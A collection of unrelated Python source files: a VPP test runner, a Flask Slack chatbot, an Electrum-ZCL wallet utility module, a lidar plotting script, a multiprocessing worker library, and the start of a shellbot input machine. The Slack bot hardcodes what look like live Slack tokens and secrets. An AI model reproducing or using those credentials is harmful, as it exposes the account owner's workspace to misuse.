if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
.format(port=self.testcase.gdbserver_port)] + args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable: '{app}'"
.format(app=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
self.args, shell=False, env=env, preexec_fn=os.setpgrp,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
pypypy.py | # -- coding: utf-8 --
import json
import os
import re
import urllib.request
import time
# 쓰레드, 큐를 위한 라이브러리 추가
import multiprocessing as mp
from threading import Thread
from bs4 import BeautifulSoup
from slackclient import SlackClient
from flask import Flask, request, make_response, render_template
app = Flask(__name__)
# slack_token = "xoxb-"
# slack_client_id = ""
# slack_client_secret = ""
# slack_verification = ""
slack_token = "xoxb-504131970294-507333492948-gfbVEOhHXoalXevCPgoTwwoO"
slack_client_id = "504131970294.507700765157"
slack_client_secret = "d8c500345b1131cec662d5857f531a3a"
slack_verification = "cmGhxZO9wtWqkPADc1KQH56x"
sc = SlackClient(slack_token)
# threading function
def processing_event(queue):
while True:
# 큐가 비어있지 않은 경우 로직 실행
if not queue.empty():
slack_event = queue.get()
# Your Processing Code Block gose to here
channel = slack_event["event"]["channel"]
text = slack_event["event"]["text"]
# 챗봇 크롤링 프로세스 로직 함수
keywords = processing_function(text)
# 아래에 슬랙 클라이언트 api를 호출하세요
sc.api_call(
"chat.postMessage",
channel=channel,
text=keywords
)
# 크롤링 함수
def processing_function(text):
# 함수를 구현해 주세요
keywords = "성공!!~"
# delay test...
# TODO: 아래 time.sleep(5) 를 지워주세요! 테스트용 코드입니다.
time.sleep(5)
return keywords
# 이벤트 핸들하는 함수
def _event_handler(event_type, slack_event):
if event_type == "app_mention":
event_queue.put(slack_event)
return make_response("App mention message has been sent", 200, )
@app.route("/listening", methods=["GET", "POST"])
def hears():
slack_event = json.loads(request.data)
if "challenge" in slack_event:
return make_response(slack_event["challenge"], 200, {"content_type":
"application/json"
})
if slack_verification != slack_event.get("token"):
message = "Invalid Slack verification token: %s" % (slack_event["token"])
make_response(message, 403, {"X-Slack-No-Retry": 1})
if "event" in slack_event:
event_type = slack_event["event"]["type"]
return _event_handler(event_type, slack_event)
# If our bot hears things that are not events we've subscribed to,
# send a quirky but helpful error response
return make_response("[NO EVENT IN SLACK REQUEST] These are not the droids\
you're looking for.", 404, {"X-Slack-No-Retry": 1})
@app.route("/", methods=["GET"])
def index():
return "<h1>Server is ready.</h1>"
if __name__ == '__main__':
event_queue = mp.Queue()
p = Thread(target=processing_event, args=(event_queue,))
p.start()
print("subprocess started")
app.run('0.0.0.0', port=8080)
p.join() |
util.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, re, json
import platform
import shutil
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urlparse
import urllib
import threading
from i18n import _
base_units = {'zcl':8, 'mzcl':5, 'uzcl':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
is_verbose = False
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.func_name
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_zcl.electrum_zcl'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-zcl'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zcl")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zcl")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zcl")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
'''Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator'''
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result.decode('utf8')
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'ZclassicExplorer.com': ('http://zclassicexplorer.com/',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'ZclassicExplorer.com': ('http://zclassicexplorer.com/',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
import bitcoin
return testnet_block_explorers if bitcoin.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'ZclassicExplorer.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
import bitcoin
from bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a vertcoin address")
return {'address': uri}
u = urlparse.urlparse(uri)
if u.scheme != 'vertcoin':
raise BaseException("Not a vertcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urlparse.parse_qs(query)
else:
pq = urlparse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid vertcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message'].decode('utf8')
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bitcoin.base_decode(out['sig'], None, base=58).encode('hex')
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
if type(message) == unicode:
message = message.encode('utf8')
query.append('message=%s'%urllib.quote(message))
p = urlparse.ParseResult(scheme='vertcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urlparse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import __builtin__
builtin_raw_input = __builtin__.raw_input
__builtin__.raw_input = raw_input
def parse_json(message):
n = message.find('\n')
if n==-1:
return None, message
try:
j = json.loads( message[0:n] )
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = ''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)" % err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = ''
except:
traceback.print_exc(file=sys.stderr)
data = ''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
self._send(out)
def send_all(self, requests):
out = ''.join(map(lambda x: json.dumps(x) + '\n', requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except socket.error as e:
if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
print_error("EAGAIN: retrying")
time.sleep(0.1)
continue
elif e[0] in ['timed out', 'The write operation timed out']:
print_error("socket timeout, retry")
time.sleep(0.1)
continue
else:
traceback.print_exc(file=sys.stdout)
raise e
import Queue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else Queue.Queue()
self.get_queue = get_queue if get_queue else Queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except Queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except Queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def check_www_dir(rdir):
import urllib, urlparse, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urlparse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.urlretrieve(URL, path)
|
rplidar_plot.py | from rplidar import RPLidar
import matplotlib.pyplot as plt
import math
import time
import numpy as np
import threading
def draw():
global is_plot
while is_plot:
plt.figure(1)
plt.cla()
plt.ylim(-9000,9000)
plt.xlim(-9000,9000)
plt.scatter(x,y,c='r',s=8)
plt.pause(0.001)
plt.close("all")
is_plot = True
x=[]
y=[]
lidar = RPLidar('/dev/ttyUSB0')
info = lidar.get_info()
print(info)
health = lidar.get_health()
print(health)
time.sleep(2)
threading.Thread(target=draw).start()
for i, scan in enumerate(lidar.iter_scans()):
print('%d: Got %d measurments' % (i, len(scan)))
x = np.zeros(len(scan))
y = np.zeros(len(scan))
for j in range(len(scan)):
x[j] = scan[j][2] * math.cos(math.radians(scan[j][1]))
y[j] = scan[j][2] * math.sin(math.radians(scan[j][1]))
lidar.stop()
lidar.stop_motor()
lidar.disconnect() |
Worker.py | '''Values evaluated on separate processes via the multiprocessing module'''
from geode import Prop,PropManager,listen,base64_encode,is_windows
import multiprocessing.connection
import multiprocessing
import subprocess
import traceback
import select
import errno
import sys
import os
__all__ = ['Worker','worker_standalone_main']
QUIT = 'quit'
QUIT_ACK = 'quit ack'
NEW_VALUE = 'new value'
SET_VALUE = 'set value'
CREATE_VALUE = 'create value'
PULL_VALUE = 'pull value'
RUN_JOB = 'run job'
class ValueProxies(PropManager):
def __init__(self,conn):
self.conn = conn
self.frozen = True
def process(self,tag,data):
'''Process a message if possible, and return whether we understood it.'''
if tag==NEW_VALUE:
name,default = data
if self.contains(name):
raise RuntimeError("input '%s' already exists on worker process"%name)
self.frozen = False
try:
self.add(name,default)
finally:
self.frozen = True
elif tag==SET_VALUE:
name,value = data
self.get(name).set(value)
else:
return False
return True
class Connection(object):
def __init__(self,side,conn,debug=False):
self.side = side
self.conn = conn
self.debug = debug
self.inputs = ValueProxies(conn)
self.outputs = {}
self.listeners = []
self.atquits = []
def add_output(self,name,value):
assert name not in self.outputs
self.outputs[name] = value
if self.debug:
print '%s: send new value %s'%(self.side,name)
val = None if value.dirty() else value()
self.conn.send((NEW_VALUE,(name,val)))
def push():
val = None if value.dirty() else value()
if self.debug:
print '%s: send push %s, %s'%(self.side,name,val)
self.conn.send((SET_VALUE,(name,val)))
self.listeners.append(listen(value,push))
def atquit(self,f):
'''Run the given function before a normal quit'''
self.atquits.append(f)
def process(self,timeout=0,count=0):
'''Check for incoming messages from the master.'''
while self.conn.poll(timeout):
tag,data = self.conn.recv()
if self.debug:
print '%s: recv %s, %s'%(self.side,tag,data)
if tag==QUIT:
for f in self.atquits:
f()
self.conn.send((QUIT_ACK,()))
sys.exit()
elif tag==CREATE_VALUE:
name,factory = data
value = factory(self.inputs)
self.add_output(name,value)
elif tag==PULL_VALUE:
name = data
node = self.outputs[name]
node()
elif tag==RUN_JOB:
# Execute function with connection and given extra arguments
f,args,kwargs = data
f(self,*args,**kwargs)
elif not self.inputs.process(tag,data):
raise ValueError("Unknown tag '%s'"%tag)
count -= 1
if not count:
break
def worker_main(conn,debug):
conn = Connection('worker',conn,debug=debug)
conn.process(timeout=None)
def worker_standalone_main(key):
debug,port,authkey = key.split(',')
debug = debug=='1'
port = int(port)
conn = multiprocessing.connection.Client(('localhost',port),authkey=authkey)
worker_main(conn,debug)
class QuitAck(BaseException):
pass
class Worker(object):
def __init__(self,debug=False,quit_timeout=1.,command=None,accept_timeout=2.):
'''Create a new worker process with two way communication via Value objects.
The worker blocks until told to launch values or jobs.
If command is specified, the worker is created using subprocess.Popen(command+[key])
and connected to via Listener/Client rather than the normal multiprocessing.Process
mechanism. This avoids strange problems with gdb and mpi on Mac. The worker should
immediately call worker_standalone_main.'''
self.debug = debug
self.inside_with = False
self.command = command
if command is None:
self.conn,child_conn = multiprocessing.Pipe()
worker = multiprocessing.Process(target=worker_main,args=(child_conn,debug))
worker.start()
self.worker_is_alive = worker.is_alive
self.worker_join = worker.join
self.worker_terminate = worker.terminate
else:
key = base64_encode(os.urandom(32))
listener = multiprocessing.connection.Listener(('localhost',0),authkey=key)
worker = self.worker = subprocess.Popen(command+['%d,%d,%s'%(bool(debug),listener.address[1],key)],shell=is_windows()) # shell=True is required on Windows, but doesn't work on Mac
# Ugly hack to avoid blocking forever if client never shows up.
# Borrowed from http://stackoverflow.com/questions/357656/proper-way-of-cancelling-accept-and-closing-a-python-processing-multiprocessing
listener.fileno = lambda:listener._listener._socket.fileno()
r,w,e = select.select((listener,),(),(),accept_timeout)
if not r:
raise RuntimeError('worker process failed to launch')
self.conn = listener.accept()
self.worker_is_alive = lambda:worker.poll() is None
self.worker_terminate = worker.terminate
self.worker_join = lambda timeout:None
self.outputs = ValueProxies(self.conn)
self.listeners = []
self.crashed = False
self.quit_timeout = quit_timeout
def __enter__(self):
self.inside_with = True
return self
def __exit__(self,*args):
def safe_join(timeout):
# See http://stackoverflow.com/questions/1238349/python-multiprocessing-exit-error for why we need this try block.
try:
self.worker_join(timeout)
except OSError,e:
if e.errno != errno.EINTR:
raise
if self.debug:
print 'master: send quit'
# First try telling the process to quit peacefully
self.conn.send((QUIT,()))
# Wait a little while for a quit acknowledgement. This is necessary for clean shutdown.
try:
self.process(timeout=self.quit_timeout)
except QuitAck:
pass
# Attempt to join with the child process peacefully
safe_join(self.quit_timeout)
# If the peaceful method doesn't work, use force
self.worker_terminate()
safe_join(None)
def add_props(self,props):
for name in props.order:
self.add_input(name,props.get(name))
def add_input(self,name,value):
assert self.inside_with
if self.debug:
print 'master: send new value %s, %s'%(name,value())
self.conn.send((NEW_VALUE,(name,value())))
def changed():
if self.debug:
print 'master: send set value %s, %s'%(name,value())
self.conn.send((SET_VALUE,(name,value())))
self.listeners.append(listen(value,changed))
def process(self,timeout=0,count=0):
'''Check for incoming messages from the worker.'''
assert self.inside_with
remaining = 1e10 if timeout is None else timeout
while 1:
# Poll without hanging if the worker process dies
if remaining<0:
return # Ran out of time
if not self.worker_is_alive():
self.crashed = True
raise IOError('worker process crashed')
# Don't wait for too long in order to detect crashes
pause = min(remaining,.21)
if self.conn.poll(pause):
# Process message
tag,data = self.conn.recv()
if self.debug:
print 'master: recv %s, %s'%(tag,data)
if tag==QUIT_ACK:
raise QuitAck()
if not self.outputs.process(tag,data):
raise ValueError("Unknown tag '%s'"%tag)
count -= 1
if not count:
return # Hit message limit
elif not pause:
break
remaining -= pause
def wait_for_output(self,name):
while not self.outputs.contains(name):
self.process(timeout=None,count=1)
return self.outputs.get(name)
def create(self,name,factory):
'''Create a node on the worker and wait for acknowledgement.'''
assert self.inside_with
if self.debug:
print 'master: send create node %s'%name
self.conn.send((CREATE_VALUE,(name,factory)))
return self.wait_for_output(name)
def pull(self,name):
if self.debug:
print 'master: send pull node %s'%name
self.conn.send((PULL_VALUE,name))
def run(self,f,*args,**kwargs):
'''Execute f(conn,*args,**kwargs) on the worker process.
If f is long running, it should periodically call conn.process(...).'''
if self.debug:
print 'master: send run job %s'%f
self.conn.send((RUN_JOB,(f,args,kwargs)))
|
input.py | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from multiprocessing import Manager, Process, Queue
import re
import time
from shellbot.i18n import _
from .base import Machine
class Input(Machine):
"""
Asks for some input
This implements a state machine that can get one piece of input
from chat participants. It can ask a question, wait for some input,
check provided data and provide guidance when needed.
Example::
machine = Input(bot=bot, question="PO Number?", key="order.id")
machine.start()
...
In normal operation mode, the machine asks a question in the chat space,
